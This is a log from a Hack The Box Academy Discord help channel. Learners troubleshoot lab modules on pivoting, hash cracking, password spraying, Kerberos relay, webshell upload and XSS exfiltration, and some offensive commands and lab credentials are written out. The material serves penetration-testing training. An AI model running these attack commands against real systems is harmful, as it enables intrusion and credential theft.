#modules
Just note the module & section you're on; ask your question. If anyone's available they'll speak up. Also it looks like you're new, check out #welcome to connect discord to your HTB account so you can see all the channels & share screen shots.
Hello, I am actually doing the module about attacking common services and I am in the part on attacking SQL databases. I have access with the mssqlsvc user and I have printed a flag, but it is kind of missing some part. Is there a possibility to change the formatting in sqlcmd so that I can see the whole output, or is there a problem with the flag in this module?
Try mssqlclient
Hi all, I am still going through the pivoting module 🤦♂️, and I am struggling from reverse port forwarding and beyond. I know ligolo gets round having to use SSH -R but I want to understand how to do these techniques. Anyone know of any resources that are good for pivoting, tunneling and port forwarding? I tried youtube but I haven't really found anything great… I posted in the resources section but got redirected here. I’m struggling to understand why my call back isn’t working even when I verified the back up script is on the target. I can’t move onto double pivot until I get it. So I’m looking for some material to gain a better understanding so I can answer it for my exams in the new year. Thanks
Well the module covers various techniques for that.
Yes I know and I can use ligolo but I am trying to find material that will help me understand how to set up the ssh -R and receive the shell on my listener
that's what they are saying. the pivot module goes over how to use ssh -D
but isnt -D dynamic port forwarding rather than -R being reverse/remote?
port forwarding goes one way
The module doesn’t cover ligolo
Mostly proxychains
I know but I am trying to understand all techniques taught but I am struggling, posted various times, so I used another tool. I am not trying to get a quick answer, I want to understand why what I am currently doing for this one section doesn't work. I used proxychains in the subsection: Dynamic Port Forwarding with SSH and SOCKS Tunneling. I am trying to grasp why in Remote/Reverse Port Forwarding with SSH, I can't get the call back to my nc listener or if I set up my meterpreter reverse shell it won't work
If I've done all the pre-reqs for that subsection, should this be the correct syntax: ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.9.2 -vN?
think I know where I have gone wrong, I was setting up the python 3 http server on my local vm not on the pivot, could be where my error is
ill re-run it, just re-read the section
I could RDP into the next host but it wouldn't go to my meterpreter. I now know why
In the "cracking passwords with hashcat" "Skills assessment-Hashcat" module it has me decipher a Kerberos TGS ticket. Where does the hash start? I tried the complete hash with mode 13100 and Rockyou word list. As well as masks and rules. No luck so far. Am I doing something wrong?
When I put the hash in ' ' or delete the beginning it shows me a "Separator unmatched" error
i've only seen that error when the hash or mode is wrong
take out the last part $
Guys I'm in ad enumeration module, ACL abuse tactics
I keep trying to change damumdsen password but it says there is no user found
But I'm able to see it's there with other commands. I already reset vpn and target
There is no $ at the end
I always reference here https://hashcat.net/wiki/doku.php?id=example_hashes
so "$krb5tgs$23$" would be the start
Yes, I used this as well
It has no $ at the end
I did multiple times
But no success
Tried Rockyou, the infreight mask and multiple rules
yea your syntax works fine
i just copied and pasted the exe through the rdp session and got a nc shell
Mode 13100 is correct?
yes
Ok, I tried the example hash. I get the "no hash loaded" error and "Separator unmatched"
Ok, seems the example hash works when I put it in ' '
I am passing Linux Fundamentals module. I have a question: Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option). I answered "--login" to this question but it is incorrect. The correct answer is "--command", WHY?
It takes the hash from htbacademy as well but no success and status=exhausted
Do I need something special for the TGS? I ran it with rules but it says 13h
13h is if it runs through the whole list, that's not the actual time
Generally takes~ 30minutes at most to crack the crackable pws
Yeah, but I have no idea if this way is the correct one
If there's a pw list given by the module, use it, otherwise typically it's in rockyou
Or any other list that may be mentioned in the section
--login basically simulates another user’s environment
Why then the "correct" answer is "--command"?
Hello, I am stuck on DNS Zone transfers submodule of Information Gathering - Web Edition Module. I keep getting the Status:NXDOMAIN error when I query inlanefreight.htb using dig. I am also not able to get any Name servers. Maybe I am doing something wrong
A tiny hint will be appreciated
usually the target you spawn for those types of modules is the nameserver you want to use
I will try them as well. If anyone has a small tip for me it will be highly appreciated. Stuck since 3 hours now
i already told you what's wrong...
that error shows up when the hash or mode is wrong
thanks mate.
got it
Yeah, but if it works it will not solve it. And I tried multiple masks and rules
because it executes commands as another user?
check your hash format, check your mode use the example hashes page to see what it should look like that someone else linked https://hashcat.net/wiki/doku.php?id=example_hashes
It accepts the hash but nothing works. That's why I thought the hash might be the wrong format
wrong wordlist perhaps
you said you got an error when running hashcat "separator unmatched" ???? are you having a different issue now?
I only get this error when I alter the hash
Might be. But the module only used this and a custom made one
And I don't want to try all in the SEC list repo
I would post a screenshot but even after the account link and restart it won't let me
Linking the account on the website doesn't do anything you need to follow the #welcome instructions
Hi everyone,
Can someone help me?
I am on the module 'Information Gathering - Web Edition' and on the chapter 'Virtual Hosts'.
Can you help me on how to do Brute-force vhosts on the target system. I tried with the command:
gobuster vhost -u <IP-AND-PORT-TARGET> -w /usr/share/secList/Discovery/DNS/subdomain-top-1millions-11000.txt --append-domain
But I get nothing.
Can someone give me a clue?
if dns isn’t set up to resolve the target ip properly, you’ll get nothing
your wordlist is also a bit massive
you’re using append domain but didn’t specify a domain to append
For DNS, how to do because I tried to add in /etc/host but the name inlanefreight.htb is not resolved
otherwise, how to do?
and how to specify the domain to add?
I'm stuck on this one "Attacking Domain Trusts - Child -> Parent Trusts - from Linux", I need to find out the Parent DC IP to proceed but I don't know where to find it
You need a domain to append
Screenshot above. Still sadly no success
Use the full rockyou, not segmented
Also idk if you need to use any rules
ip domain.com
what does the hint say
Where can I find the full? The TGZ also has only the segmented
The tgz should be the full iirc
rockyou.txt.tgz
There is none for that task
THANK YOU!!! That worked
Is there a bug in the module acl abuse tactics?
Bug found; ||skill issue||
Bc I am following the commands and they all work up to the command to change password of user damumdsen where it says user not found. But I can see the user I queried it with powershell
I changed to wley
User damundsen
Make sure you're spelling it right then
Yes rn I'm on mobile and it's autocorrecting words
On laptop I'm copy pasting
But why does it say user not found if it's literally there and I can query it
¯_(ツ)_/¯
Can I know if it's a bug
why this taking so long??
it’s not
restart target and try again
haven’t done that module
How do you know it's not a bug
idk because you’re the only one saying it’s a bug?
the machine??
I am asking if it's a bug
If you never did the machine you can't know if it's a bug
reset target and try again
okay, is it a bug?
Trying to find out
wait till you find out the bug is really a skill issue
Reach out to support
Those are the only ones that can tell you 100%
Need some help? Learn how to reach the support team on Academy.
still same
what module is this?
not from academy tbh, its a machine chemistry
I put in /etc/hosts
<IP TARGET> inlanefreight.htb
but no result
I mean I just need someone that finished the module to tell me if he got the same error
why no result
I don't remember seeing anyone complain or post in #1234357888114364508 about it
ty
You still need to specify the port in your requests
inlanefreight.htb:port
Hi
Active Directory Enumeration & Attacks / Internal Password Spraying - from Windows
Q: Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.
I tried this and it did not work
PS C:\Tools> . .\DomainPasswordSpray.ps1
PS C:\Tools> Invoke-DomainPasswordSpray -Password Winter2022 -Domain INLANEFREIGHT.LOCAL -OutFile spray_success -ErrorAction SilentlyContinue
[*] Could not connect to the domain. Try specifying the domain name with the -Domain option.
that’s because the server relies on specific host headers to serve the correct vhost
i swear this is written somewhere in that module
It's ok, I found the problem
awesome
thoughts on working through a pentest with chat gpt? do's and don'ts? specifically in the labs at the end of the modules. Is there a better way?
Absolutely no idea why it didn't work for 4 hours and now it worked ,literally did everything the same
chatgpt is an amazing tool and can help quite a bit, however you still need to know the content to know when chatgpt is wrong. it's awesome for making quick scripts or explaining certain attack paths etc.
anyone got tele
better to ask in #general this channel is dedicated to academy
ok
yea it seems like it can lead you down quite a wormhole if you don't keep it on track and/or remind it of certain things. I was just curious as to how others used it, if at all and if there was a better service for what we are doing other than chatgpt
it says i don't have permission
Can someone help me with the first question with the Laudanum question on the Shells and Payloads module. I'm following the module, but when I do the upload without deleting the comments I get a 404 message. When I delete the comments and art I get runtime errors
:hacker:
Experiencing difficulties in module #Attacking Common Services section SMB. I thought all that was required to download an SMB file within a share was read permissions, is this not the case?
Laudanum shells need to have the proper changes made before they can be used. If you don't, you just get served the 404 page as part of laud's stealth stuff
I add the ip of the target as in the module says
Other than deleting the comments and art, im not sure if the file needs anymore editing
Shouldn't it be the IP of your VPN interface? I don't really remember. Point me to the section link
Hold on let me try something
Ahhh, okay I guess I missed that part
ooops
@misty current Thank you, I can figure out from here
I dont know what im doing wrong.
Im doing the Attacking Common Services - Easy and i have gotten to the database, and got the webshell but im not able to interact with it.
it says:
The requested URL was not found on this server.
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 10.129.156.99 Port 80
When i try to go to <ip>/webshell.php
I used the mysql webshell upload command found in the attacking sql portion but i edited the directory location to what was found in the txt file found on the site.
the fact that this challenge is labeled easy is incredibly humbling.
Doing DACL Attacks I: Skills Assessment and got some WriteDacl to exploit, and only have the user hash from mimikatz and I get that error
does anyone know what could be the issue ?
that was the hardest of the 3 ngl
did you put it in the right directory?
i put it in here Directory|| "C:\xampp\htdocs"||
it showed the ||apache directory in the WebServersInfo.txt||
but im so lost right now
boutta put a webshell in every damn folder on that computer
well, your error says invalid credentials. i used a password here not a hash.
dm the mysql command
there are other vulnerabilities discussed in the module
I have indicated -hashse :d231212..... it should accept it, am I wrong
i can't confirm since i didn't use a hash, but since the message says 'invalid credentials' i'm going to guess its wrong
I will look for a pass, tried to crack the hash but didn't work
i also am not sure you're using the right user
using administrator
NT Authority
well there you go
nt authority isn't a domain user, it has no permissions over users
plus there is no domain nt authority user
so it says invalid creds
use a domain account
but i had this issue where mimikatz won't work except as NT user, and I had to use psexec .\PsExec64.exe -i -s cmd.exe to spawn new cmd
did you use other tool to get the pass ?
ok that doesn't change anything
understandable, one way or the other
ok i see now
i think you were a bit further than i was looking, so i did use a hash but you can't use nt authority on domain stuff
nt authority has permissions over the local system thats it, not any domain objects
I submitted the hash as an answer of one of the question and it's correct, but I think owneredit.py doesn't like the syntax
I could be wrong
new info to add, thanks
Yo
no spoilers please
That wasnt a spoiler, those answers are all wrong
The answers are not lining up with the questions
for previously completed modules
they must have updated the module since you answered then
hey
your question doesnt make any sense
😭
how can i use Fierce to check for zone transfers? the module doesn't go in depth on this.
I tried fierce --domain inlanefreight.htb --dns 10.129.203.6
but it didn't work.
Here 10.129.203.6 is the resolver/target
you cant
its not built for that
the module says "Tools like Fierce can also be used to enumerate all DNS servers of the root domain and scan for a DNS zone transfer"
just completed Footprinting in the Pentesters course. Looking for suggestions, do I continue to the next module or try 1-2 easy boxes? I've done the first four modules and haven't done any HTB boxes outside of the modules.
You can try Granny/Grandpa. They are fun easy boxes I reckon
fierce is good for enumerating dns
thats where its usefulness ends
so manually checking for zone transfers is the go?
yes
you can try some, but many of them contain stuff learned later in the path or out of scope for CPTS
ISSUE FIXED It was a typo
Need help with the ids/ips module
Using snort fundamentals
Trying to use snort rules to find the pcap file but idk if I’m writing it wrong
Can tariffs affect hackthebox discord server?
I think this is the wrong chat for that question. It’s also very vague.
But to answer the question shortly and with my personal opinion, no
Okay, thanks @cloud urchin
I have a question regarding https://academy.hackthebox.com/module/109/section/1037 and character shifting:
Despite the explanation about character shifting with echo $(tr '!-}' '"-~'<<<[) I was not able to run any payload equivalent to ls $(tr '!-}' '"-~'<<<.) . Can anyone highlight me on how to encode or make the $(tr '!-}' '"-~'<<<.) part work?
Just encoding isn't always enough. That command you're using to character shift could contain blacklisted characters and/or other restrictions too.
can anyone provide any hints on skills assessment Q1 of Intro to Whitebox Pentesting? been stuck on this for a couple days and had no luck searching for hints 😦
i'm trying to target the ping function but can't seem to properly escape to get command execution
Mid server
why so mad
lol
If you have a HTB account , identify yourself and your HTB name will show here
What is that
Or just change your username handle, that works too. But you need to identify yourself before you can chat in #general
Are you a bot
No
Cap
that's what a bot would say though
Where my proof
You’re a bot
Lol
Jk. None of us are bots
Why did you edit
Because I made a typo. Wrote bit instead of bot
I know, but i was wondering if anyone had an example for it. I tried with ${FIS}, with tab encoded as urls etc. But couldn't get it to work. So I was just wondering if anyone had a working example so I could learn from it 🙂
Ahh ok. I don't think I even used character shifting for that exercise iirc. Btw the ||tr command might be blacklisted||, so maybe try bypassing that using one of the methods shown in the module.
Oh yeah I managed to get what i want using another method. I just wanted to use that opportunity to practice that is all. Thank you for the help 🙂
Hi guys, can any one help me with this question, it's from the Linux priv escalation module "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."
@normal sand never mind there is an example later on, on https://academy.hackthebox.com/module/109/section/1039
I tried using the command 'grep -r HTB' can you please give me some hints
hi! have you solved lab? cant connect using nc
You need to specify the source port to connect with
still i am just getting timeout
idk some magic)))
reset and used pwnbox and worked
it's from your DNS 😉
usually, when you get this type of an error it is client-side related
thanks @fathom pendant and @midnight galleon
Hi, I've spent lots of time to get this to work but all in vain:
```
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
```
Any help will be appreciated
I have tried usernames as ./htbdbuser , htbdbuser
SharpUp just does the permission check behind the scenes and tells you what all you can abuse and doesn't exactly list the permission to you in the front (unless there's a flag for it but idk). Also, about the course cherry picking it is because it could have been random if there were a lot of results but in the case of the course, it was the only one which demonstrates service binaries that can be modified by the current user
Which module/section is this?
This is attacking common services - SQL Databases
I guess your problem is, you're trying to login to the MSSQL with -windows-auth which requires the user's machine where you execute this command to be part of a trusted domain or to have a valid Kerberos ticket digested.
the prerequisite of the exercise is :
Authenticate to 10.129.203.12 (ACADEMY-ATTCOMSVC-WIN-02) with user "htbdbuser" and password "MSSQLAccess01!"
I don't know how I am supposed to authenticate other than that
i can login as that, but I need privs on the database to access flagDB, and I got a nudge that authenticating to Windows could get me privs
more privs to accessing DB
has anyone tried findstr for hiding data in ADS
File Upload (Bug Bounty Path) -> Type Filters -> a list attached does not exist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
There is this one instead I guess https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt
I have seclists. It may be the one from there, actually. Just letting mods know to fix it eventually.
flagDB part is the second question isn't it? You're supposed to engage the second question with the credentials you got from completing the first question not htbdbuser
hello
hello @slim carbon
How are you ? @storm elk
all good - but this is a channel for supporting people with Academy modules. Please read and follow #welcome to get access to general chat
How are you? 🙂
exactly what the Academy is for
GOOD
?
Does it also work for French people?
It works for everyone who speaks english
What if we don't speak it fluently?
Should still work - there are always sites that can help you translate
Please check the website, you will see what is on there
Yeah, I figured that I might need to generate a dump via responder and my SMB server, and then crack that hash using john.
Thank you!
ok so im putting the answer in this textbox but it says its incorrect 💀 can somebody explain to me what im doing wrong
heres the info of the machine to which im connected with RDC
I recommend you mention the module and section name
its the module 49 and section 454 incase somebody needs it
Don't share answers
Also this is unhelpful, module name would be like "Windows Fundamentals" section "information" or something like that, found at the top of the page
windows fundamentals > introduction to windows > Connecting to the Windows Target
done???
tysm!!
That way if you get stuck again, people will be more readily able to help
tyy!
It's been resolved
;)
Careful of spoilers
Hi everyone!
I'm Elizabeth from South Africa
I'm a business owner and also passionate about business
I'm here to learn more about programming
Hi everyone! Who can I contact for help with the NTLM Relay Attacks Skills Assessment module? I'm stuck on the last question and either can't put all the findings together or I'm just jaded and out of ideas.
Hey people currently doing information gathering web edition but got stuck on the web archives section answer field wont accept Palm Organizer for the paypal bit
any and all help appreciated : )
what do you have so far? I have some crude notes on how I did the skill assessment
Hello everyone!
Can someone help me with the last question of the skills assessment of the DACL II module?
I have the ntlm hash of the ||tangui|| user, i suppose i have to do samaccountname spoofing, but i can't create a computer account and i can't modify the existing ones owned by ||tangui|| user. Any suggestions?
check if tangui has any rights regarding gpos
what was it by chance?
Hello, I'm stuck on (AD Enumeration and Attacks) Credentialed Enumeration - from Windows.
When I'm using SharpHound to generate the .zip file, it just produces a bunch of .json files. And when I try to convert the .json files and compress them all into one .zip file, it doesn't show anything in BloodHound.
don't zip the entire folder just the json files
wait, so if i run
Compress-Archive -Path *.json -DestinationPath inlane.zip
does this not Zip the .json files or it zips the entire folder?
check in the .zip to confirm
blood hound expects the json files to be at the root of the archive
can i dm so i can ask more questions without filling up this chat?
yes
okay
is it possible to trace location by Bitcoin wallet?
because one person wants to scam me badly and sent me her Bitcoin wallet
and since I want to report her to police, I need to get some of her personal data
no you don't
if its tied to an identity, say via an exchange that requires kyc
yoooo what module is this sounds very interesting
all I have is her probable name, facebook account and bitcoin wallet
awesome
worst is that she uses "Sex scam" ... like, she will pay you for hook up, but you have to send her 80 dollars on BTC wallet OR Steam Gift Card
No one cares mate
Just report it to authorities or something
she pays you?
no you don't
no, she does not
Not really, can just report the situation
Anyways
We can’t do anything about it
i'll suggest leaving the situation alone buddy
ok
The police can subpoena for identifying information. You don't need to collect it.
does anyone know why i have always this error with mimikatz
Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
Are you actually trying to run the executable?
yes
Double check. That error doesn't sound like you have a valid executable.
okay, fixed, .exe was corrupted during uplink
After a lot of swearing and frustration.. 😄 Thought I was going crazy, but it was all about me running via VPN instead of pwnbox... 😄
Hi, im learning the linux fundamentals module and when I try to connect via ssh I get an error, could someone help me?
what's the error
ssh: connect to host 10.129.45.245 port 22: No route to host
guessing you're on your own machine / VM, did the VPN start correctly ?
Yeah I think so, I get this message in the terminal "Initialization Sequence Completed"
any1 else have this problem or am i just lacking braincells
what does the question say?
I solved the problem
on the double pivot section of Pivoting, Tunneling, and Port Forwarding, is it common for the .155 box to drop out a lot?
According to the paypal.com website in October 1999, what could you use to "beam money to anyone"? Answer with the product name, eg My Device, remove the ™ from your answer.
ive tried it with spaces,nospaces,using caps and no caps,with the TM and without no idea why it wont work
because it’s a wrong answer
there is only 1 archive for october 1999 and thats the only thing on it
no
look harder
its also the only thing with TM in the name
yes
your answer looks right
but still not in the right format
look harder
thank you man
awesome
Anyone can help me?
im doing kerberoast and i receive this error
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Google the error
googled. does not work any solution, im using proxychains
i googled and it says you need to sync date with the dc
yes
What module
And can you reach the dc?
attacking enterprise network - active directory compromise
i can reach via proxychains from the machine where i want to kerberoast
currently im in the skills assessment for "Information Gathering"
my QA fields are totally bugged, i haven't touched this box previously but there are already answers entered, but wrong ones and now i can't enter the actual answers...
contact support on the site
If you did the module in the past, then that's why. But yeah reach out to support
no there are totally wrong answers, like whats the api key, and as answer is "cat factory 1" xD
I have a question about Pro lab Zephyr. Is there a channel on this server where its appropriate to ask these kinds of questions?
Yes, because those are the answers to the previous version of the module
#1263635449335910531 , you might need to read and follow #welcome to access
alr thx
The error means you need to sync your clock with the DC
take this holy command from me and don't question it 
faketime "$(ntpdate -q ${ip} | cut -d ' ' -f 1,2)" \
command-to-run
faketime temporarily sets the time to anything u specify for the next command, the ntpdate part takes the time from the dc ip
it has
It should be at the bottom, if you answer all the questions
did u complete all questions?

this is the main problem
this means u can't see that ip
ur pivot is not working
do proxychains ping ip
icmp works over proxychains?
not sure
but since nmap works ig yes?
but yeah u -Pn nmap so prolly no
ok do proxychain nmap ip -sn -Pn
okay does not work
btw iirc u can use external ip of dc to get time
I was questioning Sora0 if they knew some magic of icmp that I wasn't aware of.
😐
okay ill try
icmp does not work over proxychain
Your best bet for HD over proxychains is full TCP connect scans
I recommend you use ligolo ng instead
it’s going to be horrendously slow
Even doing the common 5 ports it'll take a while.
yeah i corrected it in the next message
academy vpn from inside vm 👀
suddenly stopped working
using NAT
normal internet works
how can i fix it?
Redownload config?
did so
Try different server?
changed area too
restart? ¯_(ツ)_/¯
Prepare 3 envelopes, get divorced, hit the gym.
have you verified you have access to internet?
did all (not married so basically i am divorced)
yes
Make sure your DNS is working?
reboot host
rebooted
reset vm
I would kill myself if i lost that vm
would be an easy fix, but a last resort
check ovpn logs
switch from NAT to bridged mode
things tend to get worse when i do that but i will try not to mess it up
now nothing works
good step
hi everyone,
could someone give me a hint on the skill assessment of Information Gathering - Web Edition on the part: What is the API key in the hidden admin directory that you have discovered on the target system?
I've been on it for a few hours
subdomain enum
how to specify a port with dnsenum?
I used ffuf
use ffuf
this wordlist
and make sure to add the subdomain to your /etc/hosts and enum that subdomain for more directories and subdomains
by running a FUZZ
http://FUZZ.inlanefreight.htb:port I get nothing or with http://inlanefreight.htb:PORT/FUZZ I get something but not much useful
so im going through this
and in the learning mod it links a "learning pyramid" article. the mod itself is using it as some sort of source for active and passive learning types, but the whole wiki article is just shitting on it as a "group of ineffective[2] learning models and representations relating different degrees of retention induced from various types of learning."
not exactly a good start lmao
okay, so instead of a staff member addressing what is a pretty big hit to credibility to these courses within the first 5 minutes of reading, you just randomize my nickname. beautiful stuff
Sorry, but not all staff/moderators can address your issues.
well you see, you've got this ability to contact any level of staff while a person like me is unable to even type in the general chat, so you saying "you can't address it" is a bad look
i would quite literally payal you 5k$ right now if you could straight up prove you don't have access to some sort of text channel that would allow you to @ping any member of staff on this discord regarding some sort of issue
If you feel there is an error in the module, please post in #1234357888114364508
waited a second for your response or to see if you were going to type, guess not. so please don't lie about your inability to contact other members of staff, it's a bad look.
learning process is a often criticized module, the actual technical modules are much better and most ppl just skip learning process
just going based off of what the site is recommending in terms of courses, probably shouldn't be recommending it if people have issues with it, especially when it seems to be a bunch of pseudoscience so far
In API Attacks --> Broken Authentication section, - I'm not sure how am i supposed to bypass the OTP authentication, which it requires email/phone access which I do not have.
entire section dedicated to a "learning pyramid" that apparently is on par with the 2000s food pyramid shit that kids were forced to learn about
hope you had your daily grain intake
Your nick was changed likely because it didn't comply with #rules
If you're not happy, contact support or report an issue in #1234357888114364508 , if you don't like the content, that's up to you.
🍞
You are not forced to learn this though. Just coz site recommends something doesnt mean its best starting point for everyone
No need to have your panties in a twist
If it contained non-ascii/English characters it gets changed
Although yeah, I agree that its kinda useless content based on the description
It's as simple as that
so i will repeat because maybe this point was lost in the reading comprehension bit. i am not annoyed that my nick was changed, and i understand why it would be. the issue is that i bring up what should be a pretty big flaw with the intro course because its based on bull-science, and instead of someone addressing that, they just change my nick and go radio silent lmao.
No one changed your nick, it's generally done by a bot
no
¯_(ツ)_/¯
I changed it as it was all question marks.
not in this situation
Ah
color me shocked
i guess im capable of finding out whether or not an action was automated
crazy
And mod ≠ staff
And as I said before, not every moderator can help you with content stuff. I am a volunteer and not staff.
/feedback is useful as well
No need to be rude about stuff.
But overall it's just a small portion of the overall course, everyone learns a little differently
It's not that deep
yeah we're going in circles now. i already said something to this response as well, i offered 5k for you to prove you don't have a channel to communicate with non-volunteer staff, and you didnt take me up on it.
this kind of the issue with butting into conversations that you aren't willing to read the context on, it just leads to words being repeated
if there’s an issue with the module you can post in #1234357888114364508 it’ll get resolved faster that way
got that, will do
As if I give a singular flying fuck if you can offer $5k
it's not
for you
jesus christ man lmao
awesome
this is why you need to read convos before giving your opinion
You're just an entitled twatmuffin
lol
Right, let's move on
he makes a valid point
i think this intro course has a section of handling frustration, can someone link it for him
but wrong delivery
I can ping the mods for you for 5k 
No need to be passive aggressive
The Process: Handling Frustration
will do
Either way, you were informed of a better way to report things you feel are off. And modules also have a review when you finish them.
i think you can drop it now man. they just let you get away with calling me an "entitled twatmuffin" so you've been given some leeway lmao
@winter schooner can you help me?
I just call it as I see it
maybe you need to bruteforce it
and i don't really get emotionally invested in discord chats
perhaps because im a believer in the Handling Frustration module
Who said I'm emotionally invested? Lmao
Right guys, lets move on
Tried that, Didnt work
Dm me and I will help
Doesn't the module show several ways to bruteforce?
I.e. generating a list of 0000 to 9999
In that section, only the use of ffuf and the wordlist xato-net-10-million-passwords-10000.txt
make a list from 0000 to 9999
I take it you've done the module, I swear it talked about generating an OTP list for numbers
Or at least I've seen others talking about it
the email in that section is the scenario you are working with
you assume that you receive a similar email
Why cant i write in general
Read and follow #welcome
Hello, I'm solving the DNS footprinting. i got almost all the answers, but im stuck on the last question. Which is: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Please help me out, I tried all the mentioned methods. But still no luck yet.
Subdomain of Subdomain
You have to find all the zones.
Take another look at the configuration options for a zone.
subdomains can have their own zones
dont know if that makes sense
😕
That's really the best hint that can be given without a direct spoiler
whats the issue?
Ad attack - miscellaneous misconfigurations - second question
I found the hash but I can't crack it, I used the command given in the module with rockyou.txt and another wordlist that I don't remember but it isn't cracking.
Hashcat gets exhausted after a while and john doesn't even recognize the hash, I also tried kirbi2john but it's the same.
Now I used a?a?a?a?a?a?a?a? and its still going after a good 30 minutes
I cracked the hash of mmorgan almost immediately with hashcat, idk what's going on with this one. Yes I copied the hash correctly in multiple files but it's still the same thing
what does the question say
Find another user with "do not require kerberos pre auth setting" enabled. Perform ASREPRoasting attack against this user, crack the hash and submit the clear text password as the answer
Rock you isn't working and another one too
I don't remember the name tho
Also are you sure it's a hash you're meant to crack?
Ay
Uh?
Nvm, i just checked the password should be in rockyou from what I recall, and you performed an ASREProasting attack yeah?
Yes and I found both mmorgan and y
Rock you gets exhausted with hashcat
I believe there may be another user but it shouldn't miss it
No
Aight
I'm looking at powershell rn and there's only mmorgan and y
I also tried hashcat on the pwnbox same thing
Give me a few minutes and I'll check and see if I have the hash saved
Thx
No fucking way
Ye I'm an idiot it cracked
```
└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.119.250
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Mon Dec 2 17:47:03 2024 #########
######## Scan completed at Mon Dec 2 17:48:23 2024 #########
0 results.
79 queries in 80 seconds (1.0 queries / sec)
┌──(kali㉿kali)-[~]
└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.197.255
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Mon Dec 2 17:49:22 2024 #########
10.129.197.255: fiona@inlanefreight.htb exists
######## Scan completed at Mon Dec 2 17:49:46 2024 #########
1 results.
79 queries in 24 seconds (3.3 queries / sec)
┌──(kali㉿kali)-[~]
└─$
```
Why do I need to reset the lab sometimes to get it working?
I don't know for certain, but I imagine something hiccups when the deployment script is running and derails the process of setting up a lab. I haven't seen it often but it is maddening when encountered.
Yeah, it misleads. I had to totally shift my approach for enumerating
Can I dm someone about AEN module?
Usually need to increase the timeout with that tool
Hi!
Anyone who can help me with the module of web application pentester senior. In the module XSS Filter Bypasses?
I was able to find the payload to bypass the filter and I am receiving data in the exfiltrate server
but I am getting NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://vulnerablesite.htb/home.php'
I tried many ways but I got nothing.
Help please 😦
Module name: Kerberos Attacks
Section: Unconstrained Delegation - Users
Hi guys,
I would really appreciate some help with this section. Whenever I get to the part where I’m running dementor.py, or printerbug.py- I get an error on krbrelayx.py saying
“Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'”
And essentially I’m not getting a TGT.
I tried **every** possible solution I could find online and I still cant figure it out.
I tried restarting the machine a few times, and also tried the lab both from the pwnbox and from my own kali lab.
-made sure that the hosts file has a record for inlanefreight.local and dc01.inlanefreight.local
-when creating the DNS record I used NSLOOKUP to make sure that it resolves to my IP
-when creating the fake SPN, I made sure that it exists by using addspn.py to query callum.dixon
-tried running krbrelayx.py with callum.dixon’s user/pass or hashes
-re-installed impacket
would appreciate any help!!!!
thank you
Yea
spn should align with the target user
this is the command im using-
python addspn.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
hide spoilers
does that user have perms to modify another user
usernames and passwords are given in advance once u spawn the lab
make sure that you installed impacket-scripts python requirements in a virtual environment python3 -m venv <PickName> ( assuming that you removed impacket-scripts from system using apt and installed impacket via github)
Hi guys currently doing (Attacking Common Applications , Attacking Splunk ) module yet right after uploading a Python or a PowerShell script i yet still dont have a shell back not sure what im doing wrong
does it have to be done using venv?
I just ran this on my machine
```
sudo apt remove python3-impacket
sudo apt remove impacket-scripts
git clone -q https://github.com/fortra/impacket;cd impacket
sudo python3 -m pip install .
```
no it doesnt
did you change the ip?
yes i have
yes
did you change the input.conf to the right script?
havent looked into that one yet
do i needed customed and upload that first before the actual rev script ?
it should all be in one zip file
just point the input.conf to the script you want to run then zip
ill try it out thanks man
In the Password attacks module, the easy lab, when I try to brute force the FTP, I get nothing and it takes so much time, I went searching of what to do, but i run the same command as other people, why it does not work for me? I tried using the lists from the module and mutate the list too
You need to use the list provided in that section. It's under Resources -> https://academy.hackthebox.com/storage/resources/Password-Attacks.zip
you're given a username and password list
@surreal rain @urban sage hey guys could you please add me back and answer my dms
it’s urgent
Hi, can you help me?
machine 10.10.11.42 Administrator
I logged in with the user michael with evil-winrm
I was able to change the password for benjamin and I logged in with smbclient
but I'm stuck there and I can't move forward
best to post the module/section you're on
Hello! Working on the web request module, to download using curl i am saying (curl -0 IP/download.php) however i cant find the download or tell if it is downloading
it'll download to whichever location you specify with your -O parameter, if you don't specify a folder and only a file then it'll save in your current working directory
is whatever directory im in with -ls the current working directory?
you can type pwd to print the working directory
any suggestions?
so it showd that my working directory is downloads but when i do -ls there is no files
then you probably didn't download it correctly. are you typing ls or -ls ? the command is just ls.
using ls, sorry i dont know why i typed -ls
k so first, don't post spoilers like the flag
second, you're using 0 not O.. O is for Output
so use -O not -0
and you also have to specify the file name in the output
curl http://website.htb/file.exe -O file.exe
oh, i see that makes sense. thank you
Not with capital -O 🤓☝️
